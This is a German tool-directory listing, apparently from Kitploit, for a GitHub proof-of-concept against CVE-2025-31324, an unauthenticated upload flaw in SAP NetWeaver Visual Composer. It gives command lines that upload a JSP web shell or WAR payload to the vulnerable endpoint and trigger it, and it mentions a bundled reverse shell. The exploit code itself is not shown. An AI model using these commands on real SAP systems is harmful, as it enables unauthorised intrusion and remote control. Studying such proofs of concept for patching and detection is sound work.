Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-31324_PoC_SAP — Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload in SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Tools/GitHubGitHub/abrewer251/cve-2025-31324_poc_sap
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubabrewer251/cve-2025-31324_poc_sap

CVE-2025-31324_PoC_SAP

Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload in SAP NetWeaver Visual Composer Metadata Uploader

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
131vor 1 JahrNoch nicht geprüft
Teilen

CVE-2025-31324_PoC

Proof-of-Concept für CVE-2025-31324: Unauthentifizierter Upload im SAP NetWeaver Visual Composer Metadata Uploader

Dieses Skript führt Folgendes aus:

  1. Datei-Upload an den verwundbaren Endpunkt (über Upload-Host/Port)
  2. Optionaler Trigger via HTTP GET (über Trigger-Host/Port)
  3. Grundlegende Antwortvalidierung/-protokollierung

Verwendungsbeispiel: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Sie haben auch die Möglichkeit, eine .war-Datei hochzuladen, falls Sie auf diese Weise ausführen möchten. cache.jsp ist eine Reverse Shell, die Ihnen Zugriff gewährt, sobald Sie sich im System befinden. (Ich arbeite noch an Problemen dort.)

Haftungsausschluss

Dies ist ausschließlich für Bildungszwecke gedacht und sollte nicht für böswillige Aktivitäten verwendet werden. Stellen Sie stets sicher, dass Sie die erforderlichen Berechtigungen haben und ethische Richtlinien befolgen, wenn Sie Sicherheitslücken testen oder erforschen.

Bei Fragen oder Unklarheiten können Sie sich gerne melden. Bleiben Sie sicher und geschützt!

Tool herunterladen